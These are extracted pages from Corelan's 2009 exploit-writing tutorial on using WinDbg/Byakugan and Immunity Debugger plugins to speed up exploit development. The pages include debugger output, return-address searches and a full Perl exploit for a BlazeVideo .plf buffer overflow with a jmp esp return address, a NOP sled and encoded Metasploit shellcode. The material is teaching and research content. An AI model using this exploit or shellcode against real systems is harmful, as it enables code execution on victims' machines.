Download Exploiting 5-Debugger Modules & Plugins Speedup (by corelanc0d3r) PDF

TitleExploiting 5-Debugger Modules & Plugins Speedup (by corelanc0d3r)
TagsSystem Software Computing Technology Computer Programming Software
File Size2.5 MB
Total Pages12
Table of Contents
                            Corelan Team
	Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development
                        
Document Text Contents
Page 1

http://www.corelan.be/
http://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
http://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
http://www.microsoft.com/whdc/devtools/debugging/default.mspx
http://windbg.info/doc/1-common-cmds.html
http://www.ollydbg.de/
http://www.immunityinc.com/products-immdbg.shtml
http://www.metasploit.com/
http://pedram.redhive.com/PyDbg/
http://www.amazon.com/Gray-Hat-Python-Programming-Engineers/dp/1593271921
http://www.codeplex.com/msecdbg
http://blog.metasploit.com/2008/08/byakugan-windbg-plugin-released.html
http://www.securityfocus.com/bid/35918/info
http://www.securityfocus.com/bid/35918/info
http://www.blazevideo.com/download.htm
http://www.corelan.be/?dl_id=40

Page 6

K
n
o
w
le
d
g
e
is
n
o
t
a
n
o
b
je
ct
, i
t’
s
a
f
lo
w

Save the environment - don’t print this document !

If you want to show your respect for my work - donate : http://www.corelan.be:8800/index.php/donate/

http://www.corelan.be - Page 6 / 12

0012f620 4b 4c 4b 58 51 54 43 30-45 50 45 50 4c 4b 47 35 KLKXQTC0EPEPLKG5
0012f630 47 4c 4c 4b 43 4c 43 35-44 38 43 31 4a 4f 4c 4b GLLKCLC5D8C1JOLK

This proves that, since our breakpoint is placed at the first byte of where nseh is overwritten, a jump of 8 bytes (- 2 bytes of code to make the jump
itself) will make the app flow jump to our shellcode.

Byakugan : findReturn
We have seen that we can also build an exploit based on direct RET overwrite (at offset 260). Let’s build a script that will demonstrate the use of
findReturn help us building a working exploit :
First, write a script that will build a payload made up of 264 metasploit pattern characters, followed by 1000 A’s :

my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8 . . . Ai7";
my $junk2 = "A" x 1000;
$payload =$junk.$junk2;

open ($FILE,">$sploitfile");a
print $FILE $payload;
close($FILE);

open ($FILE2,">c:\\junk2.txt");
print $FILE2 $junk2;
close($FILE2);

When opening the sploitfile, windbg reports this :

(c34.7f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569c
eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_ionInfo.dll>+0x37694135:
37694136 ?? ???

Let’s use the byakugan arsenal to find all required information to build a working exploit :
track the metasploit pattern ($junk) ●
track the A’s ($junk2) ●
see where eip is overwritten (offset) ●
see where $junk and $junk2 are ●
find return addresses ●

0:000> !load byakugan
[Byakugan] Successfully loaded!

0:000> !jutsu identBuf msfpattern myJunk1 264
[J] Creating buffer myJunk1.

0:000> !jutsu identBuf file myJunk2 c:\junk2.txt
[J] Creating buffer myJunk2.

0:000> !jutsu listBuf
[J] Currently tracked buffer patterns:
Buf: myJunk1 Pattern: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0A... (etc)
Buf: myJunk2 Pattern: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (etc)

0:000> !jutsu hunt
[J] Controlling eip with myJunk1 at offset 260.
[J] Found buffer myJunk1 @ 0x0012f254
[J] Found buffer myJunk2 @ 0x0012f460
[J] Found buffer myJunk2 @ 0x0012f460 - Victim of toUpper!

0:000> !jutsu findReturn
[J] started return address hunt
[J] valid return address (jmp esp) found at 0x3d9572cc
[J] valid return address (call esp) found at 0x3d9bb043
[J] valid return address (jmp esp) found at 0x3d9bd376
[J] valid return address (call esp) found at 0x4b2972cb
[J] valid return address (jmp esp) found at 0x4b297591
[J] valid return address (call esp) found at 0x4b297ccb
[J] valid return address (jmp esp) found at 0x4b297f91
[J] valid return address (call esp) found at 0x4ec5c26d
[J] valid return address (jmp esp) found at 0x4ec88543
[J] valid return address (call esp) found at 0x4ece5a73
[J] valid return address (jmp esp) found at 0x4ece7267
[J] valid return address (call esp) found at 0x4ece728f
[J] valid return address (jmp esp) found at 0x4f1c5055
[J] valid return address (call esp) found at 0x4f1c50eb
[J] valid return address (jmp esp) found at 0x4f1c53b1
[J] valid return address (call esp) found at 0x4f1c5aeb
[J] valid return address (jmp esp) found at 0x4f1c5db1
[J] valid return address (jmp esp) found at 0x74751873
[J] valid return address (call esp) found at 0x7475d20f
[J] valid return address (jmp esp) found at 0x748493ab
[J] valid return address (call esp) found at 0x748820df
[J] valid return address (jmp esp) found at 0x748d5223
[J] valid return address (call esp) found at 0x755042a9
[J] valid return address (jmp esp) found at 0x75fb5700
[J] valid return address (jmp esp) found at 0x76b43adc
[J] valid return address (call esp) found at 0x77132372
[J] valid return address (jmp esp) found at 0x77156342
[J] valid return address (call esp) found at 0x77506cca
[J] valid return address (jmp esp) found at 0x77559bff
[J] valid return address (call esp) found at 0x7756e37b
[J] valid return address (jmp esp) found at 0x775a996b
[J] valid return address (jmp esp) found at 0x77963da3
[J] valid return address (call esp) found at 0x7798a67b

Corelan Team - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be/index.php/terms-of-use 12/02/2011 - 6 / 12

Page 7

K
n
o
w
le
d
g
e
is
n
o
t
a
n
o
b
je
ct
, i
t’
s
a
f
lo
w

Save the environment - don’t print this document !

If you want to show your respect for my work - donate : http://www.corelan.be:8800/index.php/donate/

http://www.corelan.be - Page 7 / 12

[J] valid return address (call esp) found at 0x77b4b543
[J] valid return address (jmp esp) found at 0x77def069
[J] valid return address (call esp) found at 0x77def0d2
[J] valid return address (jmp esp) found at 0x77e1b52b
[J] valid return address (call esp) found at 0x77eb9d02
[J] valid return address (jmp esp) found at 0x77f31d8a
[J] valid return address (call esp) found at 0x77f396f7
[J] valid return address (jmp esp) found at 0x77fab227
etc...

Results :
eip was overwritten at offset 260 from myJunk1. ●
myJunk2 (A’s) was found at 0x0012f460 (which is esp-10). So if we replaced eip with jmp esp, we can let our shellcode begin at myJunk2 + 10 bytes (or 16●
characters)
we need to remove the last 4 bytes from $junk in our script, and add the address (4 bytes) of jmp esp or call esp, which will overwrite RET. (Of course, you●
still need to verify the address…). We’ll use 0x035fb847 as an example (not shown in the output above, I still prefer to manually select the return addresses
using memdump or findjmp – just because you cannot see the module they belong to in the output of ‘findReturn’…
we need to●

replace the 1000 A’s with shellcode ❍
add at least 16 NOP’s before the shellcode (I have added 50 nops … If you add less, you may see shellcode corruption, which I easily detected using❍
memDiff)

Script :

my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6A...Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai"; #260 characters
#$junk is now 4 byte shorter
my $ret = pack('V',0x035fb847); #jmp esp from EqualizerProcess.dll
my $nop="\x90" x 50;
# windows/exec - 302 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="\x89\xe3\xdb\xc2\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58" .
"\x51\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x47\x35\x47\x4c" .
"\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a\x4f\x4c\x4b" .
"\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b" .
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31" .
"\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x44\x34\x45\x57" .
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44" .
"\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4a\x45\x4c\x4b" .
"\x51\x4f\x46\x44\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c" .
"\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b" .
"\x45\x4c\x4c\x4b\x43\x31\x4a\x4b\x4d\x59\x51\x4c\x46\x44" .
"\x43\x34\x49\x53\x51\x4f\x46\x51\x4b\x46\x43\x50\x46\x36" .
"\x45\x34\x4c\x4b\x50\x46\x50\x30\x4c\x4b\x51\x50\x44\x4c" .
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x42\x48\x43\x38" .
"\x4b\x39\x4a\x58\x4d\x53\x49\x50\x43\x5a\x50\x50\x43\x58" .
"\x4c\x30\x4d\x5a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b\x4e" .
"\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x43\x53\x43\x51" .
"\x42\x4c\x43\x53\x43\x30\x41\x41";

$payload =$junk.$ret.$nop.$shellcode;

open ($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);





Corelan Team - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be/index.php/terms-of-use 12/02/2011 - 7 / 12

http://www.corelan.be:8800/wp-content/uploads/2009/09/image.png
http://www.corelan.be:8800/wp-content/uploads/2009/09/image1.png

Page 11

K
n
o
w
le
d
g
e
is
n
o
t
a
n
o
b
je
ct
, i
t’
s
a
f
lo
w

Save the environment - don’t print this document !

If you want to show your respect for my work - donate : http://www.corelan.be:8800/index.php/donate/

http://www.corelan.be - Page 11 / 12

This command does not require any arguments. Just run the command from a command line, and look at the ASLR /dynamicbase table for memory
locations that are not ASLR enabled/aware.
This one does not only save you time, it will simply mean the difference between being able to build a reliably working exploit and a one-shot working
exploit (one that stops working after a reboot).

pvefindaddr
This is a small plugin I wrote myself. I will shortly discuss the following 4 operations (but the current version has many many more functions) :

p : look for pop/pop/ret combinations (useful when building SEH based exploits) It will automatically filter out the modules that are safeseh protected. So the●
addresses you get will be not safeseh protected. Furthermore, it will automatically try all combinations and look in all loaded modules (so you don’t have to
specify a register or module. If you specify a register, then it will only show combinations where the register is used. If you specify a register and a module
name, then you will obviously get all combinations where this register is used, and only from the specified module (even if that module is safeseh protected
!)
j : look for all jmp/call/push ret combinations (useful when building direct ret overwrite exploits). You have to specify the register to jump to, and optionally●
specify a module name
jseh : this operation is useful when bypassing safeseh protections. (see tutorial series part 6). Again, this operation will search for all combinations●
automatically
nosafeseh : show all currently loaded modules that are not safeseh protected ●

Download/more info
Other pycommands & command syntax
In order to get more info on how to use the pycommands, simply run the pycommand from the command line without arguments, open the log data
windows and you’ll get a short help text indicating the parameters that need to be provided in order to correctly run the script.

Other commands will simply open a nice wizard when they are launched without parameters (such as the !antidep command), and others will just
throw an exception :-(
More information about immdbg and pycommands can be found here and here
(ImmDbg has a lot of cool scripts to help with heap based exploit development, which is out of scope for this article right now)
Happy hunting !

Some other cool stuff in immdbg
!packets
Allows you to capture packets from the wire and get the function that was responsible for sending/receiving the packets. Example : Open firefox and
attach immdbg to the process. Before kicking firefox out of the debugger-enforced breakpoint, launch !packets
Continue to run firefow and navigate to a website. Now go back to immdbg and observe the “Captured Packets” window :

Corelan Team - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be/index.php/terms-of-use 12/02/2011 - 11 / 12

http://www.corelan.be:8800/wp-content/uploads/2009/09/image15.png
http://www.corelan.be:8800/wp-content/uploads/2009/09/image49.png
http://www.corelan.be:8800/index.php/security/pvefindaddr-py-immunity-debugger-pycommand/
http://www.corelan.be:8800/wp-content/uploads/2009/09/image16.png
http://www.immunitysec.com/downloads/IntelligentDebugging.pdf
http://www.immunitysec.com/downloads/Debugging_With_ID.odp

Page 12

K
n
o
w
le
d
g
e
is
n
o
t
a
n
o
b
je
ct
, i
t’
s
a
f
lo
w

Save the environment - don’t print this document !

If you want to show your respect for my work - donate : http://www.corelan.be:8800/index.php/donate/

http://www.corelan.be - Page 12 / 12

!safeseh
This command will list the executable modules and indicate whether they are safeseh protected or not. After running the !safeseh command, you need
to open the “Log Data” window to see the results.

Copyright secured by Digiprove © 2010 Peter Van Eeckhoutte

This entry was posted
on Saturday, September 5th, 2009 at 11:35 am and is filed under 001_Security, Exploit Writing Tutorials, Exploits
You can follow any responses to this entry through the Comments (RSS) feed. You can leave a response, or trackback from your own site.

Corelan Team - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be/index.php/terms-of-use 12/02/2011 - 12 / 12

http://www.corelan.be:8800/wp-content/uploads/2009/09/image17.png
http://www.corelan.be:8800/wp-content/uploads/2009/09/image18.png
http://www.digiprove.com/show_certificate.aspx?id=P68457%26guid=ggyFk_v3IkGCBQ8fuHV3QQ
http://www.digiprove.com/show_certificate.aspx?id=P68457%26guid=ggyFk_v3IkGCBQ8fuHV3QQ
http://www.corelan.be/security
http://www.corelan.be/exploit-writing-tutorials
http://www.corelan.be/exploits
http://www.corelan.be/index.php/comments/feed/
http://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/trackback/

Similer Documents